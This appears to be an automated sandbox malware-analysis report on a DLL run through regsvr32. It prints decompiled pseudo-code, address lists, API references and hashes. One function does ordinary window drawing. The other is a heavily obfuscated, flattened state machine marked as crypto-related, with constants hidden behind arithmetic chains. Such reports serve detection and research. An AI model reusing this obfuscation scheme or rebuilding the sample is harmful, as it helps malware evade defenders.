				if( *0x10096d20 != 0) {
					_t74 = IsIconic(_t152);
					__eflags = _t74;
					if(_t74 == 0) {
						_v56 = 1;
						SendMessageA(_t152, 0x11ef, 0,  &_v56);
						_t77 = GetWindowLongA(_t152, 0xfffffff0);
						__eflags = _v56;
						if(_v56 != 0) {
							__eflags = (_t77 & 0x10400080) - 0x10400080;
							if((_t77 & 0x10400080) == 0x10400080) {
								_t80 = (_t77 & 0x00c00000) - 0xc00000;
								__eflags = _t80 - 1;
								asm("sbb ebp, ebp");
								__eflags = GetWindowLongA - 1;
								asm("sbb eax, eax");
								_t124 =  *0x10097818 - _t80 + 1;
								_t151 = GetWindowDC(_t152);
								GetWindowRect(_t152,  &_v48);
								_v48.right.left = _v48.right.left - _v48.left;
								_push(0xf);
								_push(7);
								_v48.bottom = _v48.bottom - _v48.top;
								_v48.top = 0;
								_v48.left = 0;
								E1002A670(_t151,  &_v48, 2);
								InflateRect( &_v48, 0xffffffff, 0xffffffff);
								_push(0xf);
								_push(2);
								E1002A670(_t151,  &_v48, 0);
								InflateRect( &_v48, 0xffffffff, 0xffffffff);
								_t134 =  *0x10096d68; // 0x0
								_t90 = SelectObject(_t151, _t134);
								_t135 =  &(_v48.right);
								_v60 = _t90;
								_t91 =  &_v56;
								 *_t135 =  *_t91;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t91 + 4));
								 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t91 + 8));
								 *((intOrPtr*)(_t135 + 0xc)) =  *((intOrPtr*)(_t91 + 0xc));
								_v32 = _v56 +  *0x10097814;
								E1002A640(_t151, _t135);
								OffsetRect( &(_v48.right), _v48.left - _v56 -  *0x10097814, 0);
								E1002A640(_t151,  &(_v48.right));
								_v48.right.left = _v56 +  *0x10097814;
								_v32 = _v48.left -  *0x10097814;
								_v28 = _v48.bottom + _t124;
								E1002A640(_t151,  &(_v48.right));
								_t161 =  &(_t156[0x10]);
								__eflags =  ~GetWindowLongA;
								if( ~GetWindowLongA != 0) {
									_t148 =  &(_v48.right);
									_t141 =  &_v24;
									_t125 = _t124 + _v48.bottom;
									 *_t141 =  *_t148;
									 *((intOrPtr*)(_t141 + 4)) = _v48.bottom;
									 *((intOrPtr*)(_t141 + 8)) =  *((intOrPtr*)(_t148 + 8));
									_push(0xf);
									_t119 =  *0x1009781c + _t125;
									__eflags = _t119;
									_push(0);
									 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t148 + 0xc));
									_v20 = _t125;
									_v12 = _t119;
									E1002A670(_t151,  &_v24, 2);
									_t161 =  &(_t161[5]);
								}
								_v48.bottom = _v48.bottom + _v48.top - _v52 -  *0x10097814;
								_t112 = _v48.bottom +  *0x10097818;
								__eflags = _t112;
								_v28 = _t112;
								E1002A640(_t151,  &(_v48.right));
								SelectObject(_t151, _v60);
								ReleaseDC(_t152, _t151);
							}
						}
						return _v60;
					} else {
						return _v60;
					}
				} else {
					return _v60;
				}
			}

0x1002b150
0x1002b15c
0x1002b166
0x1002b16d
0x1002b172
0x1002b15e
0x1002b15e
0x1002b160
0x1002b160
0x1002b17b
0x1002b17c
0x1002b19d
0x1002b17e
0x1002b18a
0x1002b18a
0x1002b1aa
0x1002b1ae
0x1002b1bf
0x1002b1c5
0x1002b1c7
0x1002b1d7
0x1002b1ec
0x1002b1fb
0x1002b1fd
0x1002b202
0x1002b210
0x1002b216
0x1002b227
0x1002b22c
0x1002b230
0x1002b234
0x1002b237
0x1002b23a
0x1002b242
0x1002b24a
0x1002b258
0x1002b25c
0x1002b262
0x1002b264
0x1002b26a
0x1002b272
0x1002b27c
0x1002b28d
0x1002b297
0x1002b299
0x1002b29f
0x1002b2b0
0x1002b2b6
0x1002b2be
0x1002b2c4
0x1002b2c8
0x1002b2cc
0x1002b2d2
0x1002b2d7
0x1002b2e2
0x1002b2e5
0x1002b2f2
0x1002b2f6
0x1002b314
0x1002b320
0x1002b332
0x1002b344
0x1002b350
0x1002b354
0x1002b359
0x1002b35c
0x1002b35e
0x1002b364
0x1002b368
0x1002b36e
0x1002b372
0x1002b377
0x1002b37d
0x1002b385
0x1002b387
0x1002b387
0x1002b389
0x1002b38d
0x1002b394
0x1002b398
0x1002b39e
0x1002b3a3
0x1002b3a3
0x1002b3ba
0x1002b3c2
0x1002b3c2
0x1002b3c8
0x1002b3cc
0x1002b3da
0x1002b3e2
0x1002b3e2
0x1002b216
0x1002b3f3
0x1002b1c9
0x1002b1d4
0x1002b1d4
0x1002b1b0
0x1002b1bb
0x1002b1bb

APIs

CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 1002B18A
DefWindowProcA.USER32(00000000,?,?,?), ref: 1002B19D
IsIconic.USER32(00000000), ref: 1002B1BF
SendMessageA.USER32 ref: 1002B1EC
GetWindowLongA.USER32(00000000,000000F0), ref: 1002B1FB
GetWindowDC.USER32(00000000), ref: 1002B23C
GetWindowRect.USER32(00000000,?), ref: 1002B24A
InflateRect.USER32 ref: 1002B28D
InflateRect.USER32 ref: 1002B2B0
SelectObject.GDI32(00000000,00000000), ref: 1002B2BE
OffsetRect.USER32 ref: 1002B314

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
String ID:
API String ID: 2215177122-0
Opcode ID: d9ede8255403480eaef2e3f34db3df9ea3de64dabee6833271d7c1d7904a030c
Instruction ID: 0e08bb32a9fd52cf73f33de94ffd16ba01e05c3e49171286e3fae7617701bf45
Opcode Fuzzy Hash: d9ede8255403480eaef2e3f34db3df9ea3de64dabee6833271d7c1d7904a030c
Instruction Fuzzy Hash: 08817B71508301AFD304CF68DC89E6BB7E4FB89318F448A1EF94987291D775EA06CB62

Uniqueness

Uniqueness Score: -1.00%

Function 003D51F0 Relevance: 19.5, Strings: 15, Instructions: 703
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E003D51F0(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				char* _v48;
				signed int _v52;
				char _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t807;
				intOrPtr _t811;
				void* _t813;
				void* _t815;
				signed int _t826;
				void* _t838;
				signed int _t851;
				void* _t860;
				void* _t865;
				signed int _t869;
				intOrPtr _t881;
				intOrPtr _t885;
				void* _t888;
				void* _t901;
				void* _t907;
				signed int _t916;
				intOrPtr _t922;
				signed int _t924;
				signed int _t925;
				signed int _t927;
				signed int _t929;
				intOrPtr _t930;
				signed int _t932;
				signed int _t933;
				signed int _t937;
				signed int _t939;
				signed int _t941;
				void* _t944;
				intOrPtr _t985;
				void* _t996;
				intOrPtr _t997;
				void* _t999;
				void* _t1004;
				signed int* _t1006;
				void* _t1011;

				_t1006 =  &_v128;
				_v76 = 0x9ce;
				_t1004 = 0;
				_v72 = __ecx;
				_t901 = 0x2bfc9;
				_t996 = 0x3e257;
				_v76 = 0xf;
				_t999 = 0xc4d46;
				_v84 = 0x19;
				_v80 = 0x53;
				while(1) {
					L1:
					_t907 = 0xb0e91;
					_t944 = 0x6276f;
					_t807 = 0xa4def;
					do {
						while(1) {
							L2:
							_t1011 = _t901 - _t807;
							if(_t1011 > 0) {
								break;
							}
							if(_t1011 == 0) {
								_v124 = 0xa4673f;
								_v124 = _v124 + 0x54d8;
								_push(_t907);
								_push(_t907);
								_v124 = _v124 * 0x31;
								_v124 = _v124 | 0xa9f2c8c8;
								_v124 = _v124 ^ 0xbff45a39;
								_v116 = 0x51ca8;
								_v116 = _v116 | 0x81798293;
								_v116 = _v116 >> 6;
								_v116 = _v116 ^ 0x020aa95a;
								_v120 = 0x43f70e;
								_v120 = _v120 | 0xd5f9b455;
								_v120 = _v120 << 5;
								_v120 = _v120 + 0x10dd;
								_v120 = _v120 ^ 0xbf75eb2a;
								_t985 =  *0x3e221c; // 0x0
								_t916 = E003C8D52(_t907,  *((intOrPtr*)(_t985 + 0x5c)), __eflags);
								_t881 =  *0x3e221c; // 0x0
								__eflags = _t916;
								_t901 =  !=  ? _t999 : _t996;
								 *(_t881 + 0x58) = _t916;
								goto L1;
							} else {
								if(_t901 == 0x2bfc9) {
									_t901 = 0xd1dca;
									continue;
								} else {
									if(_t901 == _t996) {
										_v96 = 0x99d9dd;
										_v96 = _v96 << 0x10;
										_v96 = _v96 ^ 0xd9dc4efe;
										_v116 = 0x141f89;
										_v116 = _v116 + 0xffff6dc3;
										_v116 = _v116 >> 5;
										_v116 = _v116 + 0xe294;
										_t802 =  &_v116;
										 *_t802 = _v116 ^ 0x00085bb2;
										__eflags =  *_t802;
										E003D8B16(_v96, _v88, _t907, _v116);
									} else {
										if(_t901 == 0x62450) {
											_v128 = 0x9722ce;
											_v128 = _v128 * 0x3d;
											_v128 = _v128 << 0xc;
											_v128 = _v128 >> 9;
											_v128 = _v128 ^ 0x0017cd07;
											_v116 = 0x8f0941;
											_v116 = _v116 | 0x1109fc3a;
											_v116 = _v116 + 0x96ca;
											_v116 = _v116 ^ 0x119849c4;
											_v124 = 0xe06614;
											_v124 = _v124 << 5;
											_v124 = _v124 * 0x39;
											_v124 = _v124 >> 0xe;
											_v124 = _v124 ^ 0x0003dc15;
											_v120 = 0x4cf435;
											_v120 = _v120 + 0x8099;
											_v120 = _v120 ^ 0x072e8008;
											_v120 = _v120 << 0xd;
											_v120 = _v120 ^ 0x7e917648;
											_t885 =  *0x3e221c; // 0x0
											E003C79D0(_v128, _v116, __eflags, _v124,  *((intOrPtr*)(_t885 + 0x58)), _v120);
											_t1006 =  &(_t1006[3]);
											_t901 = _t996;
											while(1) {
												L1:
												_t907 = 0xb0e91;
												_t944 = 0x6276f;
												_t807 = 0xa4def;
												goto L2;
											}
										} else {
											if(_t901 == _t944) {
												_v124 = 0xcf965;
												_v124 = _v124 + 0x8961;
												_v124 = _v124 * 0xd;
												_v124 = _v124 >> 5;
												_v124 = _v124 ^ 0x00051bbe;
												_v108 = 0x1faeb6;
												_v108 = _v108 | 0x773a40a1;
												_v108 = _v108 ^ 0x773275ba;
												_v128 = 0x674681;
												_v128 = _v128 << 4;
												_v128 = _v128 + 0xffffbe10;
												_v128 = _v128 + 0x90ef;
												_v128 = _v128 ^ 0x067136a5;
												_v104 = 0x5d6cad;
												_v104 = _v104 + 0xffff8b22;
												_v104 = _v104 ^ 0x0056c679;
												_t888 = E003CD933(_v124, _v108, 0x3c12ac, _v128, _v104);
												_v120 = 0xa648ab;
												_v120 = _v120 + 0xffff9d9f;
												_v120 = _v120 << 7;
												_v120 = _v120 | 0x4357eb7f;
												_v120 = _v120 ^ 0x53f29e99;
												_v128 = 0x4e5c2b;
												_v128 = _v128 ^ 0xe03c8e1d;
												_v128 = _v128 << 0xe;
												_v128 = _v128 * 0x5a;
												_v128 = _v128 ^ 0x79b54b0d;
												_v108 = 0x96d40e;
												_v108 = _v108 + 0xffff4a1e;
												_v108 = _v108 ^ 0x0096dad1;
												_v124 = 0x43baac;
												_v124 = _v124 >> 0xf;
												_v124 = _v124 * 6;
												_v124 = _v124 * 0x54;
												_v124 = _v124 ^ 0x000eeb80;
												_v104 = 0xd63130;
												_v104 = _v104 + 0xad92;
												_v104 = _v104 ^ 0x00d6ee11;
												_t922 =  *0x3e221c; // 0x0
												E003D2B70(_t922 + 0x5c, _v120, _t888, _v88, _v128, _v124, _v108, _v124,  &_v92, _v104);
												_v124 = 0xc591bb;
												_t901 =  ==  ? 0xa4def : _t996;
												_t924 = 0x7e;
												_v124 = _v124 / _t924;
												_t925 = 0x6e;
												_v124 = _v124 / _t925;
												_v124 = _v124 >> 0xe;
												_v124 = _v124 ^ 0x000e6a28;
												_v104 = 0x846776;
												_v104 = _v104 * 0x73;
												_v104 = _v104 ^ 0x3b7b8298;
												_v120 = 0xde1e7b;
												_v120 = _v120 + 0xffffd05b;
												_v120 = _v120 >> 9;
												_v120 = _v120 | 0x4c3b34bc;
												_v120 = _v120 ^ 0x4c361275;
												E003C43D3(_v124, _v104, _v120, _t888);
												_t1006 =  &(_t1006[0xd]);
												L22:
												_t944 = 0x6276f;
												_t907 = 0xb0e91;
												_t999 = 0xc4d46;
												_t807 = 0xa4def;
											}
											goto L23;
										}
									}
								}
							}
							L26:
							return _t1004;
						}
						__eflags = _t901 - _t907;
						if(_t901 == _t907) {
							_v124 = 0xa7c29f;
							_v124 = _v124 + 0xffffb6ca;
							_v124 = _v124 >> 9;
							_v124 = _v124 + 0x9acf;
							_v124 = _v124 ^ 0x000f47aa;
							_v120 = 0xcf9b2;
							_v120 = _v120 + 0xffffcae0;
							_v120 = _v120 + 0x3856;
							_v120 = _v120 / _v84;
							_v120 = _v120 ^ 0x0001d27a;
							_v116 = 0x9a5f7d;
							_v116 = _v116 + 0xffffea14;
							_v116 = _v116 | 0x50bc5c62;
							_v116 = _v116 * 3;
							_v116 = _v116 ^ 0xf23d5eae;
							_v104 = 0xd3bd63;
							_v104 = _v104 ^ 0x039adae1;
							_v104 = _v104 ^ 0xead75b2d;
							_v104 = _v104 ^ 0xe993c5e1;
							_t811 = E003CD933(_v124, _v120, 0x3c11fc, _v116, _v104);
							_v108 = 0xec8d26;
							_t997 = _t811;
							_v108 = _v108 ^ 0xea102064;
							_v108 = _v108 ^ 0x679147d8;
							_v108 = _v108 ^ 0x8d61575c;
							_v120 = 0x121d4e;
							_v120 = _v120 << 2;
							_v120 = _v120 << 0xd;
							_v120 = _v120 << 0xd;
							_v120 = _v120 ^ 0xe00eb191;
							_v116 = 0xc9af06;
							_v116 = _v116 >> 7;
							_v116 = _v116 << 0x10;
							_v116 = _v116 >> 6;
							_v116 = _v116 ^ 0x0248bd3c;
							_v104 = 0x848201;
							_v104 = _v104 * 0x49;
							_v104 = _v104 >> 0xa;
							_v104 = _v104 ^ 0x00064a9b;
							_t813 = E003CD933(_v108, _v120, 0x3c130c, _v116, _v104);
							_v116 = 0x9f6deb;
							_v116 = _v116 >> 0x10;
							_v116 = _v116 | 0x7b87fc8a;
							_v116 = _v116 + 0x2e02;
							_v116 = _v116 ^ 0x7b882aa1;
							_v64 = _v116;
							_v96 = 0x8f5490;
							_v96 = _v96 ^ 0xa6b52308;
							_v96 = _v96 ^ 0xa63a7799;
							_v116 = 0x31e64f;
							_v116 = _v116 + 0x16da;
							_v116 = _v116 ^ 0x4eebd71b;
							_v116 = _v116 + 0xffffa5f8;
							_v116 = _v116 ^ 0x4ed79eda;
							_v108 = 0x8e6e75;
							_v108 = _v108 + 0xffff045a;
							_v108 = _v108 | 0x0ead9fac;
							_v108 = _v108 ^ 0x0eaf09a7;
							_v104 = 0xe78687;
							_v104 = _v104 + 0xffffb074;
							_v104 = _v104 >> 5;
							_v104 = _v104 ^ 0x000ae354;
							_t815 = E003CB10B(_v116, _v108, _v104, _t997);
							_v60 = _t997;
							_v68 = _t815 + _v96 + _t815 + _v96;
							_v96 = 0xd6ffea;
							_v96 = _v96 << 4;
							_v96 = _v96 ^ 0x0d6ffea0;
							_v56 = _v96;
							_v96 = 0xef8b82;
							_v96 = _v96 << 4;
							_v96 = _v96 ^ 0x0ef8b821;
							_v52 = _v96;
							_v48 =  &_v68;
							_v104 = 0x21059f;
							_v104 = _v104 | 0xeffb611c;
							_v104 = _v104 / _v80;
							_v104 = _v104 ^ 0x02e42f5d;
							_v92 = _v104;
							_v100 = 0xab8d80;
							_v100 = _v100 >> 9;
							_v100 = _v100 ^ 0x00013e18;
							_v96 = 0x60dfca;
							_v96 = _v96 | 0xbadcf063;
							_v96 = _v96 ^ 0xbaf57c7d;
							_v108 = 0x900c0;
							_v108 = _v108 + 0x7aad;
							_v108 = _v108 | 0x65fb4c27;
							_v108 = _v108 ^ 0x65f375b6;
							_v116 = 0xbafe6f;
							_v116 = _v116 | 0x1d82c93a;
							_v116 = _v116 >> 3;
							_v116 = _v116 + 0x37e7;
							_v116 = _v116 ^ 0x03b76067;
							_v104 = 0x41a1aa;
							_v104 = _v104 ^ 0x555d4147;
							_v104 = _v104 ^ 0xb8d38fcf;
							_v104 = _v104 ^ 0xedc0b143;
							_t826 = E003DFE74(_v72,  &_v32, _v100,  &_v92, _t813, _v116, _v96, _v108,  &_v56, _v116, _v104, _v92);
							_v108 = 0x8e878e;
							__eflags = _t826;
							_t901 =  ==  ? 0x6276f : 0x3e257;
							_v108 = _v108 ^ 0x6ee38fda;
							_v108 = _v108 >> 0xb;
							_v108 = _v108 ^ 0x00091aa2;
							_v104 = 0x35f20b;
							_v104 = _v104 << 0xf;
							_v104 = _v104 ^ 0x2a896bf8;
							_v104 = _v104 ^ 0xd382a1ff;
							_v96 = 0x7cae60;
							_v96 = _v96 * 0xf;
							_v96 = _v96 ^ 0x07409a45;
							E003C43D3(_v108, _v104, _v96, _t997);
							_v108 = 0x160d63;
							_v108 = _v108 ^ 0xd162a1ef;
							_v108 = _v108 / _v76;
							_v108 = _v108 ^ 0x0df219ea;
							_v104 = 0x947dd9;
							_v104 = _v104 ^ 0xe1a53e7e;
							_v104 = _v104 >> 0xf;
							_v104 = _v104 ^ 0x0001526b;
							_v96 = 0xcadfaa;
							_v96 = _v96 + 0xffff241a;
							_t785 =  &_v96;
							 *_t785 = _v96 ^ 0x00cb8756;
							__eflags =  *_t785;
							E003C43D3(_v108, _v104, _v96, _t813);
							_t1006 =  &(_t1006[0x16]);
							goto L21;
						} else {
							__eflags = _t901 - _t999;
							if(_t901 == _t999) {
								_v116 = 0xf5f279;
								_t927 = 0x3a;
								_v116 = _v116 * 0x12;
								_v116 = _v116 / _t927;
								_v116 = _v116 ^ 0x00490368;
								_v108 = 0xe79298;
								_v108 = _v108 + 0xa01e;
								_v108 = _v108 ^ 0x00e0274f;
								_v104 = 0x1867e;
								_v104 = _v104 | 0x5af20674;
								_v104 = _v104 ^ 0x5af18b13;
								_v120 = 0xf15b1c;
								_v120 = _v120 >> 6;
								_v120 = _v120 * 0x71;
								_v120 = _v120 >> 6;
								_v120 = _v120 ^ 0x000a827e;
								_t380 =  &_v116; // 0xe0274f
								_t838 = E003CD933( *_t380, _v108, 0x3c12ec, _v104, _v120);
								_v104 = 0xb1b682;
								_t1001 = _t838;
								_v104 = _v104 ^ 0x3b2c7068;
								_v104 = _v104 ^ 0x76df82a1;
								_v44 = _v104;
								_v120 = 0x2b3613;
								_v120 = _v120 | 0xdb8f4d24;
								_v120 = _v120 << 3;
								_v120 = _v120 >> 2;
								_v120 = _v120 ^ 0x375efe6f;
								_v40 = _v120;
								_v120 = 0xf37290;
								_v120 = _v120 / _v84;
								_v120 = _v120 << 0xb;
								_v120 = _v120 + 0xfffff094;
								_v120 = _v120 ^ 0x4de728b4;
								_v36 = _v120;
								_v104 = 0xc35977;
								_v104 = _v104 * 0x4b;
								_v104 = _v104 + 0xffffc6a2;
								_v104 = _v104 ^ 0x3932e10e;
								_v96 = 0x22157d;
								_v96 = _v96 ^ 0xca6f104d;
								_v96 = _v96 ^ 0xca48bfe4;
								_v108 = 0xea40c5;
								_v108 = _v108 / _v80;
								_v108 = _v108 + 0x78d1;
								_v108 = _v108 ^ 0x000dd41d;
								_v116 = 0x25edf6;
								_v116 = _v116 ^ 0x129d8baf;
								_v116 = _v116 ^ 0x9319261e;
								_v116 = _v116 | 0xe5402d25;
								_v116 = _v116 ^ 0xe5e5bb40;
								_v128 = 0x47c9de;
								_v128 = _v128 ^ 0x19112c92;
								_v128 = _v128 + 0xffff9d91;
								_v128 = _v128 ^ 0xbb598c7e;
								_v128 = _v128 ^ 0xa20134c9;
								_v124 = 0x92d4aa;
								_v124 = _v124 ^ 0x08747683;
								_t929 = 0x3e;
								_v124 = _v124 / _t929;
								_v124 = _v124 ^ 0xf3ba7a48;
								_v124 = _v124 ^ 0xf3902239;
								_v120 = 0xc50f8;
								_v120 = _v120 + 0xffff6ddf;
								_v120 = _v120 >> 2;
								_v120 = _v120 << 0xc;
								_v120 = _v120 ^ 0x2eff7591;
								_v112 = 0x303e6f;
								_v112 = _v112 + 0x3fe7;
								_v112 = _v112 | 0x2bf34275;
								_v112 = _v112 ^ 0x2bf7a96a;
								_v100 = 0x946793;
								_v100 = _v100 >> 9;
								_v100 = _v100 ^ 0x0004c021;
								_t930 =  *0x3e221c; // 0x0
								_t500 = _t930 + 0x64; // 0x64
								_t851 = E003C74D5(_v104, _v96, _v108, _v116,  *((intOrPtr*)(_t930 + 0x5c)),  *((intOrPtr*)(_t930 + 0x58)), _t500, _v88, _v128, _t929, _v124, _v120, _t838, _v112, _t929, _v100, _t929,  &_v44);
								_t1006 =  &(_t1006[0x13]);
								__eflags = _t851;
								if(_t851 != 0) {
									_t901 = 0x62450;
								} else {
									_t901 = _t996;
									_t1004 = 1;
								}
								_v116 = 0x5d89a7;
								_v116 = _v116 << 4;
								_v116 = _v116 + 0x44f;
								_t932 = 0x54;
								_v116 = _v116 * 0x23;
								_v116 = _v116 ^ 0xcc96cb5d;
								_v108 = 0x25da34;
								_t933 = 0x75;
								_v108 = _v108 / _t932;
								_v108 = _v108 >> 1;
								_v108 = _v108 ^ 0x00051b1b;
								_v104 = 0x82e6c9;
								_v104 = _v104 / _t933;
								_v104 = _v104 | 0x43642a89;
								_v104 = _v104 ^ 0x436e338d;
								E003C43D3(_v116, _v108, _v104, _t1001);
								goto L22;
							} else {
								__eflags = _t901 - 0xd1dca;
								if(__eflags == 0) {
									_v128 = 0xdecbaf;
									_v128 = _v128 + 0x596a;
									_v128 = _v128 << 9;
									_v128 = _v128 ^ 0xbe4ce0ad;
									_v124 = 0xe1ed7b;
									_v124 = _v124 + 0xd412;
									_v124 = _v124 ^ 0xf17ad6eb;
									_v124 = _v124 ^ 0x7c44ad3d;
									_v124 = _v124 ^ 0x8ddd2a7f;
									_v116 = 0xbb8c40;
									_v116 = _v116 | 0x663d4875;
									_v116 = _v116 << 0xe;
									_v116 = _v116 ^ 0xf31df1b6;
									_v120 = 0xb6e93b;
									_t937 = 0x4b;
									_v120 = _v120 / _t937;
									_v120 = _v120 + 0x10a4;
									_v120 = _v120 ^ 0xfadd0258;
									_v120 = _v120 ^ 0xfad0f147;
									_t860 = E003CD933(_v128, _v124, 0x3c132c, _v116, _v120);
									_v124 = 0xbc198a;
									_v124 = _v124 ^ 0xdd5b295f;
									_t939 = 0x6e;
									_v124 = _v124 * 0xe;
									_v124 = _v124 ^ 0x22a843e9;
									_v120 = 0xc909f1;
									_v120 = _v120 / _t939;
									_v120 = _v120 ^ 0x2c8e9978;
									_v120 = _v120 ^ 0x2c8b14f3;
									_v116 = 0x1b5992;
									_v116 = _v116 * 0x62;
									_v116 = _v116 | 0x0034b04d;
									_v116 = _v116 ^ 0x0a72baf6;
									_v104 = 0xe41911;
									_v104 = _v104 << 9;
									_v104 = _v104 ^ 0xc83ba20a;
									_t865 = E003CD933(_v124, _v120, 0x3c121c, _v116, _v104);
									_v124 = 0x8681d3;
									_v124 = _v124 + 0xffff5146;
									_v124 = _v124 | 0xb63d979b;
									_v124 = _v124 ^ 0xb6b78048;
									_v120 = 0xf828b1;
									_v120 = _v120 >> 0xc;
									_v120 = _v120 << 1;
									_v120 = _v120 + 0xfc2b;
									_v120 = _v120 ^ 0x000e1259;
									_v116 = 0xaaaf69;
									_v116 = _v116 * 0x5e;
									_v116 = _v116 / _v76;
									_v116 = _v116 ^ 0x0420f9dc;
									_v104 = 0xf0946f;
									_v104 = _v104 + 0xef36;
									_v104 = _v104 ^ 0x00f0043d;
									_t869 = E003C22D2( &_v88, _v124, _t860, _v120, _v116, _t865, _v104);
									_v108 = 0x4892be;
									__eflags = _t869;
									_t901 =  ==  ? 0xb0e91 : 0x62adf;
									_v108 = _v108 << 0xf;
									_v108 = _v108 ^ 0x495318a2;
									_v120 = 0x45b843;
									_v120 = _v120 << 3;
									_t941 = 0x56;
									_v120 = _v120 / _t941;
									_v120 = _v120 ^ 0x130608db;
									_v120 = _v120 ^ 0x130ced5d;
									_v104 = 0xb716c5;
									_v104 = _v104 * 0x1f;
									_v104 = _v104 ^ 0x1624e7aa;
									E003C43D3(_v108, _v120, _v104, _t860);
									_v124 = 0x6cd76f;
									_v124 = _v124 | 0xd5d9ebbe;
									_v124 = _v124 ^ 0xd5f12506;
									_v120 = 0xd4d8d3;
									_v120 = _v120 | 0xfb1b04d0;
									_v120 = _v120 >> 1;
									_v120 = _v120 ^ 0x7de8f57c;
									_v116 = 0xa9accd;
									_v116 = _v116 ^ 0x8f89db72;
									_v116 = _v116 + 0xffff1e2c;
									_v116 = _v116 ^ 0x8f1eefcc;
									E003C43D3(_v124, _v120, _v116, _t865);
									_t1006 =  &(_t1006[0x10]);
									L21:
									_t996 = 0x3e257;
									goto L22;
								}
							}
						}
						L23:
					} while (_t901 != 0x62adf);
					goto L26;
				}
			}

0x003d51f0
0x003d51fa
0x003d5202
0x003d5204
0x003d5208
0x003d520d
0x003d5212
0x003d521a
0x003d521f
0x003d5227
0x003d522f
0x003d522f
0x003d522f
0x003d5234
0x003d5239
0x003d523e
0x003d523e
0x003d523e
0x003d523e
0x003d5240
0x00000000
0x00000000
0x003d5246
0x003d5530
0x003d5538
0x003d5545
0x003d5546
0x003d5547
0x003d554b
0x003d5553
0x003d555b
0x003d5563
0x003d556b
0x003d5570
0x003d5578
0x003d5580
0x003d5588
0x003d558d
0x003d5595
0x003d55a9
0x003d55b9
0x003d55bd
0x003d55c2
0x003d55c4
0x003d55c7
0x00000000
0x003d524c
0x003d5252
0x003d5526
0x00000000
0x003d5258
0x003d525a
0x003d603f
0x003d6047
0x003d604c
0x003d6054
0x003d605c
0x003d6064
0x003d6069
0x003d6071
0x003d6071
0x003d6071
0x003d6086
0x003d5260
0x003d5266
0x003d5474
0x003d5481
0x003d5485
0x003d548a
0x003d548f
0x003d5497
0x003d549f
0x003d54a7
0x003d54af
0x003d54b7
0x003d54bf
0x003d54c9
0x003d54cd
0x003d54d2
0x003d54da
0x003d54e2
0x003d54ea
0x003d54f2
0x003d54f7
0x003d5503
0x003d5517
0x003d551c
0x003d551f
0x003d522f
0x003d522f
0x003d522f
0x003d5234
0x003d5239
0x00000000
0x003d5239
0x003d526c
0x003d526e
0x003d5274
0x003d527c
0x003d5289
0x003d528d
0x003d5292
0x003d529a
0x003d52a2
0x003d52aa
0x003d52b2
0x003d52ba
0x003d52bf
0x003d52c7
0x003d52cf
0x003d52d7
0x003d52df
0x003d52e7
0x003d5304
0x003d5309
0x003d5313
0x003d531e
0x003d5323
0x003d532b
0x003d5333
0x003d533b
0x003d5343
0x003d534d
0x003d5351
0x003d5359
0x003d5361
0x003d5369
0x003d5371
0x003d5379
0x003d5383
0x003d538c
0x003d5394
0x003d539c
0x003d53a4
0x003d53ac
0x003d53c6
0x003d53d8
0x003d53df
0x003d53ee
0x003d53f9
0x003d53fe
0x003d5408
0x003d540b
0x003d540f
0x003d5414
0x003d541c
0x003d542a
0x003d542e
0x003d5436
0x003d543e
0x003d5446
0x003d544b
0x003d5453
0x003d5467
0x003d546c
0x003d601d
0x003d601d
0x003d6022
0x003d6027
0x003d602c
0x003d602c
0x00000000
0x003d526e
0x003d5266
0x003d525a
0x003d5252
0x003d608f
0x003d6099
0x003d6099
0x003d55cf
0x003d55d1
0x003d5be4
0x003d5bee
0x003d5bf6
0x003d5bfb
0x003d5c03
0x003d5c0b
0x003d5c13
0x003d5c1b
0x003d5c2b
0x003d5c2f
